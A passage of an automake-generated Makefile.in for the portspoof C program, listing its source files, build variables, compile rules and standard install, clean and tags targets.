ETAGS = etags
|
||||
CTAGS = ctags
|
||||
DISTFILES = $(DIST_COMMON) $(DIST_SOURCES) $(TEXINFOS) $(EXTRA_DIST)
|
||||
ACLOCAL = @ACLOCAL@
|
||||
AMTAR = @AMTAR@
|
||||
AUTOCONF = @AUTOCONF@
|
||||
AUTOHEADER = @AUTOHEADER@
|
||||
AUTOMAKE = @AUTOMAKE@
|
||||
AWK = @AWK@
|
||||
CC = @CC@
|
||||
CCDEPMODE = @CCDEPMODE@
|
||||
CFLAGS = @CFLAGS@
|
||||
CPP = @CPP@
|
||||
CPPFLAGS = @CPPFLAGS@
|
||||
CYGPATH_W = @CYGPATH_W@
|
||||
DEFS = @DEFS@
|
||||
DEPDIR = @DEPDIR@
|
||||
ECHO_C = @ECHO_C@
|
||||
ECHO_N = @ECHO_N@
|
||||
ECHO_T = @ECHO_T@
|
||||
EGREP = @EGREP@
|
||||
EXEEXT = @EXEEXT@
|
||||
GREP = @GREP@
|
||||
INSTALL = @INSTALL@
|
||||
INSTALL_DATA = @INSTALL_DATA@
|
||||
INSTALL_PROGRAM = @INSTALL_PROGRAM@
|
||||
INSTALL_SCRIPT = @INSTALL_SCRIPT@
|
||||
INSTALL_STRIP_PROGRAM = @INSTALL_STRIP_PROGRAM@
|
||||
LDFLAGS = @LDFLAGS@
|
||||
LIBOBJS = @LIBOBJS@
|
||||
LIBS = @LIBS@
|
||||
LTLIBOBJS = @LTLIBOBJS@
|
||||
MAKEINFO = @MAKEINFO@
|
||||
MKDIR_P = @MKDIR_P@
|
||||
OBJEXT = @OBJEXT@
|
||||
PACKAGE = @PACKAGE@
|
||||
PACKAGE_BUGREPORT = @PACKAGE_BUGREPORT@
|
||||
PACKAGE_NAME = @PACKAGE_NAME@
|
||||
PACKAGE_STRING = @PACKAGE_STRING@
|
||||
PACKAGE_TARNAME = @PACKAGE_TARNAME@
|
||||
PACKAGE_VERSION = @PACKAGE_VERSION@
|
||||
PATH_SEPARATOR = @PATH_SEPARATOR@
|
||||
SET_MAKE = @SET_MAKE@
|
||||
SHELL = @SHELL@
|
||||
STRIP = @STRIP@
|
||||
VERSION = @VERSION@
|
||||
abs_builddir = @abs_builddir@
|
||||
abs_srcdir = @abs_srcdir@
|
||||
abs_top_builddir = @abs_top_builddir@
|
||||
abs_top_srcdir = @abs_top_srcdir@
|
||||
ac_ct_CC = @ac_ct_CC@
|
||||
am__include = @am__include@
|
||||
am__leading_dot = @am__leading_dot@
|
||||
am__quote = @am__quote@
|
||||
am__tar = @am__tar@
|
||||
am__untar = @am__untar@
|
||||
bindir = @bindir@
|
||||
build = @build@
|
||||
build_alias = @build_alias@
|
||||
build_cpu = @build_cpu@
|
||||
build_os = @build_os@
|
||||
build_vendor = @build_vendor@
|
||||
builddir = @builddir@
|
||||
datadir = @datadir@
|
||||
datarootdir = @datarootdir@
|
||||
docdir = @docdir@
|
||||
dvidir = @dvidir@
|
||||
exec_prefix = @exec_prefix@
|
||||
host = @host@
|
||||
host_alias = @host_alias@
|
||||
host_cpu = @host_cpu@
|
||||
host_os = @host_os@
|
||||
host_vendor = @host_vendor@
|
||||
htmldir = @htmldir@
|
||||
includedir = @includedir@
|
||||
infodir = @infodir@
|
||||
install_sh = @install_sh@
|
||||
libdir = @libdir@
|
||||
libexecdir = @libexecdir@
|
||||
localedir = @localedir@
|
||||
localstatedir = @localstatedir@
|
||||
mandir = @mandir@
|
||||
mkdir_p = @mkdir_p@
|
||||
oldincludedir = @oldincludedir@
|
||||
pdfdir = @pdfdir@
|
||||
prefix = @prefix@
|
||||
program_transform_name = @program_transform_name@
|
||||
psdir = @psdir@
|
||||
sbindir = @sbindir@
|
||||
sharedstatedir = @sharedstatedir@
|
||||
srcdir = @srcdir@
|
||||
sysconfdir = @sysconfdir@
|
||||
target_alias = @target_alias@
|
||||
top_builddir = @top_builddir@
|
||||
top_srcdir = @top_srcdir@
|
||||
|
||||
# File lists
|
||||
headers = connection.h portspoof.h revregex.h threads.h log.h config_file.h
|
||||
sources = connection.c portspoof.c revregex.c log.c config_file.c
|
||||
portspoof_SOURCES = $(headers) $(sources)
|
||||
|
||||
# Threads
|
||||
portspoof_LDFLAGS = @LDFLAGS@ -pthread
|
||||
|
||||
#Preprocessor detinitions
|
||||
portspoof_CPPFLAGS = -DCONFDIR='"$(sysconfdir)"'
|
||||
all: config.h
|
||||
$(MAKE) $(AM_MAKEFLAGS) all-am
|
||||
|
||||
.SUFFIXES:
|
||||
.SUFFIXES: .c .o .obj
|
||||
$(srcdir)/Makefile.in: $(srcdir)/Makefile.am $(am__configure_deps)
|
||||
@for dep in $?; do \
|
||||
case '$(am__configure_deps)' in \
|
||||
*$$dep*) \
|
||||
cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh \
|
||||
&& exit 0; \
|
||||
exit 1;; \
|
||||
esac; \
|
||||
done; \
|
||||
echo ' cd $(top_srcdir) && $(AUTOMAKE) --gnu src/Makefile'; \
|
||||
cd $(top_srcdir) && \
|
||||
$(AUTOMAKE) --gnu src/Makefile
|
||||
.PRECIOUS: Makefile
|
||||
Makefile: $(srcdir)/Makefile.in $(top_builddir)/config.status
|
||||
@case '$?' in \
|
||||
*config.status*) \
|
||||
cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh;; \
|
||||
*) \
|
||||
echo ' cd $(top_builddir) && $(SHELL) ./config.status $(subdir)/$@ $(am__depfiles_maybe)'; \
|
||||
cd $(top_builddir) && $(SHELL) ./config.status $(subdir)/$@ $(am__depfiles_maybe);; \
|
||||
esac;
|
||||
|
||||
$(top_builddir)/config.status: $(top_srcdir)/configure $(CONFIG_STATUS_DEPENDENCIES)
|
||||
cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh
|
||||
|
||||
$(top_srcdir)/configure: $(am__configure_deps)
|
||||
cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh
|
||||
$(ACLOCAL_M4): $(am__aclocal_m4_deps)
|
||||
cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh
|
||||
|
||||
config.h: stamp-h1
|
||||
@if test ! -f $@; then \
|
||||
rm -f stamp-h1; \
|
||||
$(MAKE) $(AM_MAKEFLAGS) stamp-h1; \
|
||||
else :; fi
|
||||
|
||||
stamp-h1: $(srcdir)/config.h.in $(top_builddir)/config.status
|
||||
@rm -f stamp-h1
|
||||
cd $(top_builddir) && $(SHELL) ./config.status src/config.h
|
||||
$(srcdir)/config.h.in: $(am__configure_deps)
|
||||
cd $(top_srcdir) && $(AUTOHEADER)
|
||||
rm -f stamp-h1
|
||||
touch $@
|
||||
|
||||
distclean-hdr:
|
||||
-rm -f config.h stamp-h1
|
||||
install-binPROGRAMS: $(bin_PROGRAMS)
|
||||
@$(NORMAL_INSTALL)
|
||||
test -z "$(bindir)" || $(MKDIR_P) "$(DESTDIR)$(bindir)"
|
||||
@list='$(bin_PROGRAMS)'; for p in $$list; do \
|
||||
p1=`echo $$p|sed 's/$(EXEEXT)$$//'`; \
|
||||
if test -f $$p \
|
||||
; then \
|
||||
f=`echo "$$p1" | sed 's,^.*/,,;$(transform);s/$$/$(EXEEXT)/'`; \
|
||||
echo " $(INSTALL_PROGRAM_ENV) $(binPROGRAMS_INSTALL) '$$p' '$(DESTDIR)$(bindir)/$$f'"; \
|
||||
$(INSTALL_PROGRAM_ENV) $(binPROGRAMS_INSTALL) "$$p" "$(DESTDIR)$(bindir)/$$f" || exit 1; \
|
||||
else :; fi; \
|
||||
done
|
||||
|
||||
uninstall-binPROGRAMS:
|
||||
@$(NORMAL_UNINSTALL)
|
||||
@list='$(bin_PROGRAMS)'; for p in $$list; do \
|
||||
f=`echo "$$p" | sed 's,^.*/,,;s/$(EXEEXT)$$//;$(transform);s/$$/$(EXEEXT)/'`; \
|
||||
echo " rm -f '$(DESTDIR)$(bindir)/$$f'"; \
|
||||
rm -f "$(DESTDIR)$(bindir)/$$f"; \
|
||||
done
|
||||
|
||||
clean-binPROGRAMS:
|
||||
-test -z "$(bin_PROGRAMS)" || rm -f $(bin_PROGRAMS)
|
||||
portspoof$(EXEEXT): $(portspoof_OBJECTS) $(portspoof_DEPENDENCIES)
|
||||
@rm -f portspoof$(EXEEXT)
|
||||
$(portspoof_LINK) $(portspoof_OBJECTS) $(portspoof_LDADD) $(LIBS)
|
||||
|
||||
mostlyclean-compile:
|
||||
-rm -f *.$(OBJEXT)
|
||||
|
||||
distclean-compile:
|
||||
-rm -f *.tab.c
|
||||
|
||||
@AMDEP_TRUE@@am__include@ @am__quote@./$(DEPDIR)/portspoof-config_file.Po@am__quote@
|
||||
@AMDEP_TRUE@@am__include@ @am__quote@./$(DEPDIR)/portspoof-connection.Po@am__quote@
|
||||
@AMDEP_TRUE@@am__include@ @am__quote@./$(DEPDIR)/portspoof-log.Po@am__quote@
|
||||
@AMDEP_TRUE@@am__include@ @am__quote@./$(DEPDIR)/portspoof-portspoof.Po@am__quote@
|
||||
@AMDEP_TRUE@@am__include@ @am__quote@./$(DEPDIR)/portspoof-revregex.Po@am__quote@
|
||||
|
||||
.c.o:
|
||||
@am__fastdepCC_TRUE@ $(COMPILE) -MT $@ -MD -MP -MF $(DEPDIR)/$*.Tpo -c -o $@ $<
|
||||
@am__fastdepCC_TRUE@ mv -f $(DEPDIR)/$*.Tpo $(DEPDIR)/$*.Po
|
||||
@AMDEP_TRUE@@am__fastdepCC_FALSE@ source='$<' object='$@' libtool=no @AMDEPBACKSLASH@
|
||||
@AMDEP_TRUE@@am__fastdepCC_FALSE@ DEPDIR=$(DEPDIR) $(CCDEPMODE) $(depcomp) @AMDEPBACKSLASH@
|
||||
@am__fastdepCC_FALSE@ $(COMPILE) -c $<
|
||||
|
||||
.c.obj:
|
||||
@am__fastdepCC_TRUE@ $(COMPILE) -MT $@ -MD -MP -MF $(DEPDIR)/$*.Tpo -c -o $@ `$(CYGPATH_W) '$<'`
|
||||
@am__fastdepCC_TRUE@ mv -f $(DEPDIR)/$*.Tpo $(DEPDIR)/$*.Po
|
||||
@AMDEP_TRUE@@am__fastdepCC_FALSE@ source='$<' object='$@' libtool=no @AMDEPBACKSLASH@
|
||||
@AMDEP_TRUE@@am__fastdepCC_FALSE@ DEPDIR=$(DEPDIR) $(CCDEPMODE) $(depcomp) @AMDEPBACKSLASH@
|
||||
@am__fastdepCC_FALSE@ $(COMPILE) -c `$(CYGPATH_W) '$<'`
|
||||
|
||||
portspoof-connection.o: connection.c
|
||||
@am__fastdepCC_TRUE@ $(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -MT portspoof-connection.o -MD -MP -MF $(DEPDIR)/portspoof-connection.Tpo -c -o portspoof-connection.o `test -f 'connection.c' || echo '$(srcdir)/'`connection.c
|
||||
@am__fastdepCC_TRUE@ mv -f $(DEPDIR)/portspoof-connection.Tpo $(DEPDIR)/portspoof-connection.Po
|
||||
@AMDEP_TRUE@@am__fastdepCC_FALSE@ source='connection.c' object='portspoof-connection.o' libtool=no @AMDEPBACKSLASH@
|
||||
@AMDEP_TRUE@@am__fastdepCC_FALSE@ DEPDIR=$(DEPDIR) $(CCDEPMODE) $(depcomp) @AMDEPBACKSLASH@
|
||||
@am__fastdepCC_FALSE@ $(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -c -o portspoof-connection.o `test -f 'connection.c' || echo '$(srcdir)/'`connection.c
|
||||
|
||||
portspoof-connection.obj: connection.c
|
||||
@am__fastdepCC_TRUE@ $(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -MT portspoof-connection.obj -MD -MP -MF $(DEPDIR)/portspoof-connection.Tpo -c -o portspoof-connection.obj `if test -f 'connection.c'; then $(CYGPATH_W) 'connection.c'; else $(CYGPATH_W) '$(srcdir)/connection.c'; fi`
|
||||
@am__fastdepCC_TRUE@ mv -f $(DEPDIR)/portspoof-connection.Tpo $(DEPDIR)/portspoof-connection.Po
|
||||
@AMDEP_TRUE@@am__fastdepCC_FALSE@ source='connection.c' object='portspoof-connection.obj' libtool=no @AMDEPBACKSLASH@
|
||||
@AMDEP_TRUE@@am__fastdepCC_FALSE@ DEPDIR=$(DEPDIR) $(CCDEPMODE) $(depcomp) @AMDEPBACKSLASH@
|
||||
@am__fastdepCC_FALSE@ $(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -c -o portspoof-connection.obj `if test -f 'connection.c'; then $(CYGPATH_W) 'connection.c'; else $(CYGPATH_W) '$(srcdir)/connection.c'; fi`
|
||||
|
||||
portspoof-portspoof.o: portspoof.c
|
||||
@am__fastdepCC_TRUE@ $(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -MT portspoof-portspoof.o -MD -MP -MF $(DEPDIR)/portspoof-portspoof.Tpo -c -o portspoof-portspoof.o `test -f 'portspoof.c' || echo '$(srcdir)/'`portspoof.c
|
||||
@am__fastdepCC_TRUE@ mv -f $(DEPDIR)/portspoof-portspoof.Tpo $(DEPDIR)/portspoof-portspoof.Po
|
||||
@AMDEP_TRUE@@am__fastdepCC_FALSE@ source='portspoof.c' object='portspoof-portspoof.o' libtool=no @AMDEPBACKSLASH@
|
||||
@AMDEP_TRUE@@am__fastdepCC_FALSE@ DEPDIR=$(DEPDIR) $(CCDEPMODE) $(depcomp) @AMDEPBACKSLASH@
|
||||
@am__fastdepCC_FALSE@ $(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -c -o portspoof-portspoof.o `test -f 'portspoof.c' || echo '$(srcdir)/'`portspoof.c
|
||||
|
||||
portspoof-portspoof.obj: portspoof.c
|
||||
@am__fastdepCC_TRUE@ $(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -MT portspoof-portspoof.obj -MD -MP -MF $(DEPDIR)/portspoof-portspoof.Tpo -c -o portspoof-portspoof.obj `if test -f 'portspoof.c'; then $(CYGPATH_W) 'portspoof.c'; else $(CYGPATH_W) '$(srcdir)/portspoof.c'; fi`
|
||||
@am__fastdepCC_TRUE@ mv -f $(DEPDIR)/portspoof-portspoof.Tpo $(DEPDIR)/portspoof-portspoof.Po
|
||||
@AMDEP_TRUE@@am__fastdepCC_FALSE@ source='portspoof.c' object='portspoof-portspoof.obj' libtool=no @AMDEPBACKSLASH@
|
||||
@AMDEP_TRUE@@am__fastdepCC_FALSE@ DEPDIR=$(DEPDIR) $(CCDEPMODE) $(depcomp) @AMDEPBACKSLASH@
|
||||
@am__fastdepCC_FALSE@ $(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -c -o portspoof-portspoof.obj `if test -f 'portspoof.c'; then $(CYGPATH_W) 'portspoof.c'; else $(CYGPATH_W) '$(srcdir)/portspoof.c'; fi`
|
||||
|
||||
portspoof-revregex.o: revregex.c
|
||||
@am__fastdepCC_TRUE@ $(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -MT portspoof-revregex.o -MD -MP -MF $(DEPDIR)/portspoof-revregex.Tpo -c -o portspoof-revregex.o `test -f 'revregex.c' || echo '$(srcdir)/'`revregex.c
|
||||
@am__fastdepCC_TRUE@ mv -f $(DEPDIR)/portspoof-revregex.Tpo $(DEPDIR)/portspoof-revregex.Po
|
||||
@AMDEP_TRUE@@am__fastdepCC_FALSE@ source='revregex.c' object='portspoof-revregex.o' libtool=no @AMDEPBACKSLASH@
|
||||
@AMDEP_TRUE@@am__fastdepCC_FALSE@ DEPDIR=$(DEPDIR) $(CCDEPMODE) $(depcomp) @AMDEPBACKSLASH@
|
||||
@am__fastdepCC_FALSE@ $(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -c -o portspoof-revregex.o `test -f 'revregex.c' || echo '$(srcdir)/'`revregex.c
|
||||
|
||||
portspoof-revregex.obj: revregex.c
|
||||
@am__fastdepCC_TRUE@ $(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -MT portspoof-revregex.obj -MD -MP -MF $(DEPDIR)/portspoof-revregex.Tpo -c -o portspoof-revregex.obj `if test -f 'revregex.c'; then $(CYGPATH_W) 'revregex.c'; else $(CYGPATH_W) '$(srcdir)/revregex.c'; fi`
|
||||
@am__fastdepCC_TRUE@ mv -f $(DEPDIR)/portspoof-revregex.Tpo $(DEPDIR)/portspoof-revregex.Po
|
||||
@AMDEP_TRUE@@am__fastdepCC_FALSE@ source='revregex.c' object='portspoof-revregex.obj' libtool=no @AMDEPBACKSLASH@
|
||||
@AMDEP_TRUE@@am__fastdepCC_FALSE@ DEPDIR=$(DEPDIR) $(CCDEPMODE) $(depcomp) @AMDEPBACKSLASH@
|
||||
@am__fastdepCC_FALSE@ $(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -c -o portspoof-revregex.obj `if test -f 'revregex.c'; then $(CYGPATH_W) 'revregex.c'; else $(CYGPATH_W) '$(srcdir)/revregex.c'; fi`
|
||||
|
||||
portspoof-log.o: log.c
|
||||
@am__fastdepCC_TRUE@ $(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -MT portspoof-log.o -MD -MP -MF $(DEPDIR)/portspoof-log.Tpo -c -o portspoof-log.o `test -f 'log.c' || echo '$(srcdir)/'`log.c
|
||||
@am__fastdepCC_TRUE@ mv -f $(DEPDIR)/portspoof-log.Tpo $(DEPDIR)/portspoof-log.Po
|
||||
@AMDEP_TRUE@@am__fastdepCC_FALSE@ source='log.c' object='portspoof-log.o' libtool=no @AMDEPBACKSLASH@
|
||||
@AMDEP_TRUE@@am__fastdepCC_FALSE@ DEPDIR=$(DEPDIR) $(CCDEPMODE) $(depcomp) @AMDEPBACKSLASH@
|
||||
@am__fastdepCC_FALSE@ $(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -c -o portspoof-log.o `test -f 'log.c' || echo '$(srcdir)/'`log.c
|
||||
|
||||
portspoof-log.obj: log.c
|
||||
@am__fastdepCC_TRUE@ $(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -MT portspoof-log.obj -MD -MP -MF $(DEPDIR)/portspoof-log.Tpo -c -o portspoof-log.obj `if test -f 'log.c'; then $(CYGPATH_W) 'log.c'; else $(CYGPATH_W) '$(srcdir)/log.c'; fi`
|
||||
@am__fastdepCC_TRUE@ mv -f $(DEPDIR)/portspoof-log.Tpo $(DEPDIR)/portspoof-log.Po
|
||||
@AMDEP_TRUE@@am__fastdepCC_FALSE@ source='log.c' object='portspoof-log.obj' libtool=no @AMDEPBACKSLASH@
|
||||
@AMDEP_TRUE@@am__fastdepCC_FALSE@ DEPDIR=$(DEPDIR) $(CCDEPMODE) $(depcomp) @AMDEPBACKSLASH@
|
||||
@am__fastdepCC_FALSE@ $(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -c -o portspoof-log.obj `if test -f 'log.c'; then $(CYGPATH_W) 'log.c'; else $(CYGPATH_W) '$(srcdir)/log.c'; fi`
|
||||
|
||||
portspoof-config_file.o: config_file.c
|
||||
@am__fastdepCC_TRUE@ $(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -MT portspoof-config_file.o -MD -MP -MF $(DEPDIR)/portspoof-config_file.Tpo -c -o portspoof-config_file.o `test -f 'config_file.c' || echo '$(srcdir)/'`config_file.c
|
||||
@am__fastdepCC_TRUE@ mv -f $(DEPDIR)/portspoof-config_file.Tpo $(DEPDIR)/portspoof-config_file.Po
|
||||
@AMDEP_TRUE@@am__fastdepCC_FALSE@ source='config_file.c' object='portspoof-config_file.o' libtool=no @AMDEPBACKSLASH@
|
||||
@AMDEP_TRUE@@am__fastdepCC_FALSE@ DEPDIR=$(DEPDIR) $(CCDEPMODE) $(depcomp) @AMDEPBACKSLASH@
|
||||
@am__fastdepCC_FALSE@ $(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -c -o portspoof-config_file.o `test -f 'config_file.c' || echo '$(srcdir)/'`config_file.c
|
||||
|
||||
portspoof-config_file.obj: config_file.c
|
||||
@am__fastdepCC_TRUE@ $(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -MT portspoof-config_file.obj -MD -MP -MF $(DEPDIR)/portspoof-config_file.Tpo -c -o portspoof-config_file.obj `if test -f 'config_file.c'; then $(CYGPATH_W) 'config_file.c'; else $(CYGPATH_W) '$(srcdir)/config_file.c'; fi`
|
||||
@am__fastdepCC_TRUE@ mv -f $(DEPDIR)/portspoof-config_file.Tpo $(DEPDIR)/portspoof-config_file.Po
|
||||
@AMDEP_TRUE@@am__fastdepCC_FALSE@ source='config_file.c' object='portspoof-config_file.obj' libtool=no @AMDEPBACKSLASH@
|
||||
@AMDEP_TRUE@@am__fastdepCC_FALSE@ DEPDIR=$(DEPDIR) $(CCDEPMODE) $(depcomp) @AMDEPBACKSLASH@
|
||||
@am__fastdepCC_FALSE@ $(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -c -o portspoof-config_file.obj `if test -f 'config_file.c'; then $(CYGPATH_W) 'config_file.c'; else $(CYGPATH_W) '$(srcdir)/config_file.c'; fi`
|
||||
|
||||
ID: $(HEADERS) $(SOURCES) $(LISP) $(TAGS_FILES)
|
||||
list='$(SOURCES) $(HEADERS) $(LISP) $(TAGS_FILES)'; \
|
||||
unique=`for i in $$list; do \
|
||||
if test -f "$$i"; then echo $$i; else echo $(srcdir)/$$i; fi; \
|
||||
done | \
|
||||
$(AWK) ' { files[$$0] = 1; } \
|
||||
END { for (i in files) print i; }'`; \
|
||||
mkid -fID $$unique
|
||||
tags: TAGS
|
||||
|
||||
TAGS: $(HEADERS) $(SOURCES) config.h.in $(TAGS_DEPENDENCIES) \
|
||||
$(TAGS_FILES) $(LISP)
|
||||
tags=; \
|
||||
here=`pwd`; \
|
||||
list='$(SOURCES) $(HEADERS) config.h.in $(LISP) $(TAGS_FILES)'; \
|
||||
unique=`for i in $$list; do \
|
||||
if test -f "$$i"; then echo $$i; else echo $(srcdir)/$$i; fi; \
|
||||
done | \
|
||||
$(AWK) ' { files[$$0] = 1; } \
|
||||
END { for (i in files) print i; }'`; \
|
||||
if test -z "$(ETAGS_ARGS)$$tags$$unique"; then :; else \
|
||||
test -n "$$unique" || unique=$$empty_fix; \
|
||||
$(ETAGS) $(ETAGSFLAGS) $(AM_ETAGSFLAGS) $(ETAGS_ARGS) \
|
||||
$$tags $$unique; \
|
||||
fi
|
||||
ctags: CTAGS
|
||||
CTAGS: $(HEADERS) $(SOURCES) config.h.in $(TAGS_DEPENDENCIES) \
|
||||
$(TAGS_FILES) $(LISP)
|
||||
tags=; \
|
||||
here=`pwd`; \
|
||||
list='$(SOURCES) $(HEADERS) config.h.in $(LISP) $(TAGS_FILES)'; \
|
||||
unique=`for i in $$list; do \
|
||||
if test -f "$$i"; then echo $$i; else echo $(srcdir)/$$i; fi; \
|
||||
done | \
|
||||
$(AWK) ' { files[$$0] = 1; } \
|
||||
END { for (i in files) print i; }'`; \
|
||||
test -z "$(CTAGS_ARGS)$$tags$$unique" \
|
||||
|| $(CTAGS) $(CTAGSFLAGS) $(AM_CTAGSFLAGS) $(CTAGS_ARGS) \
|
||||
$$tags $$unique
|
||||
|
||||
GTAGS:
|
||||
here=`$(am__cd) $(top_builddir) && pwd` \
|
||||
&& cd $(top_srcdir) \
|
||||
&& gtags -i $(GTAGS_ARGS) $$here
|
||||
|
||||
distclean-tags:
|
||||
-rm -f TAGS ID GTAGS GRTAGS GSYMS GPATH tags
|
||||
|
||||
distdir: $(DISTFILES)
|
||||
@srcdirstrip=`echo "$(srcdir)" | sed 's/[].[^$$\\*]/\\\\&/g'`; \
|
||||
topsrcdirstrip=`echo "$(top_srcdir)" | sed 's/[].[^$$\\*]/\\\\&/g'`; \
|
||||
list='$(DISTFILES)'; \
|
||||
dist_files=`for file in $$list; do echo $$file; done | \
|
||||
sed -e "s|^$$srcdirstrip/||;t" \
|
||||
-e "s|^$$topsrcdirstrip/|$(top_builddir)/|;t"`; \
|
||||
case $$dist_files in \
|
||||
*/*) $(MKDIR_P) `echo "$$dist_files" | \
|
||||
sed '/\//!d;s|^|$(distdir)/|;s,/[^/]*$$,,' | \
|
||||
sort -u` ;; \
|
||||
esac; \
|
||||
for file in $$dist_files; do \
|
||||
if test -f $$file || test -d $$file; then d=.; else d=$(srcdir); fi; \
|
||||
if test -d $$d/$$file; then \
|
||||
dir=`echo "/$$file" | sed -e 's,/[^/]*$$,,'`; \
|
||||
if test -d $(srcdir)/$$file && test $$d != $(srcdir); then \
|
||||
cp -pR $(srcdir)/$$file $(distdir)$$dir || exit 1; \
|
||||
fi; \
|
||||
cp -pR $$d/$$file $(distdir)$$dir || exit 1; \
|
||||
else \
|
||||
test -f $(distdir)/$$file \
|
||||
|| cp -p $$d/$$file $(distdir)/$$file \
|
||||
|| exit 1; \
|
||||
fi; \
|
||||
done
|
||||
check-am: all-am
|
||||
check: check-am
|
||||
all-am: Makefile $(PROGRAMS) config.h
|
||||
installdirs:
|
||||
for dir in "$(DESTDIR)$(bindir)"; do \
|
||||
test -z "$$dir" || $(MKDIR_P) "$$dir"; \
|
||||
done
|
||||
install: install-am
|
||||
install-exec: install-exec-am
|
||||
install-data: install-data-am
|
||||
uninstall: uninstall-am
|
||||
|
||||
install-am: all-am
|
||||
@$(MAKE) $(AM_MAKEFLAGS) install-exec-am install-data-am
|
||||
|
||||
installcheck: installcheck-am
|
||||
install-strip:
|
||||
$(MAKE) $(AM_MAKEFLAGS) INSTALL_PROGRAM="$(INSTALL_STRIP_PROGRAM)" \
|
||||
install_sh_PROGRAM="$(INSTALL_STRIP_PROGRAM)" INSTALL_STRIP_FLAG=-s \
|
||||
`test -z '$(STRIP)' || \
|
||||
echo "INSTALL_PROGRAM_ENV=STRIPPROG='$(STRIP)'"` install
|
||||
mostlyclean-generic:
|
||||
|
||||
clean-generic:
|
||||
|
||||
distclean-generic:
|
||||
-test -z "$(CONFIG_CLEAN_FILES)" || rm -f $(CONFIG_CLEAN_FILES)
|
||||
|
||||
maintainer-clean-generic:
|
||||
@echo "This command is intended for maintainers to use"
|
||||
@echo "it deletes files that may require special tools to rebuild."
|
||||
clean: clean-am
|
||||
|
||||
clean-am: clean-binPROGRAMS clean-generic mostlyclean-am
|
||||
|
||||
distclean: distclean-am
|
||||
-rm -rf ./$(DEPDIR)
|
||||
-rm -f Makefile
|
||||
distclean-am: clean-am distclean-compile distclean-generic \
|
||||
distclean-hdr distclean-tags
|
||||
|
||||
dvi: dvi-am
|
||||
|
||||
dvi-am:
|
||||
|
||||
html: html-am
|
||||
|
||||
info: info-am
|
||||
|
||||
info-am:
|
||||
|
||||
install-data-am:
|
||||
|
||||
install-dvi: install-dvi-am
|
||||
|
||||
install-exec-am: install-binPROGRAMS
|
||||
|
||||
install-html: install-html-am
|
||||
|
||||
install-info: install-info-am
|
||||
|
||||
install-man:
|
||||
|
||||
install-pdf: install-pdf-am
|
||||
|
||||
install-ps: install-ps-am
|
||||
|
||||
installcheck-am:
|
||||
|
||||
maintainer-clean: maintainer-clean-am
|
||||
-rm -rf ./$(DEPDIR)
|
||||
-rm -f Makefile
|
||||
maintainer-clean-am: distclean-am maintainer-clean-generic
|
||||
|
||||
mostlyclean: mostlyclean-am
|
||||
|
||||
mostlyclean-am: mostlyclean-compile mostlyclean-generic
|
||||
|
||||
pdf: pdf-am
|
||||
|
||||
pdf-am:
|
||||
|
||||
ps: ps-am
|
||||
|
||||
ps-am:
|
||||
|
||||
uninstall-am: uninstall-binPROGRAMS
|
||||
|
||||
.MAKE: install-am install-strip
|
||||
|
||||
.PHONY: CTAGS GTAGS all all-am check check-am clean clean-binPROGRAMS \
|
||||
clean-generic ctags distclean distclean-compile \
|
||||
distclean-generic distclean-hdr distclean-tags distdir dvi \
|
||||
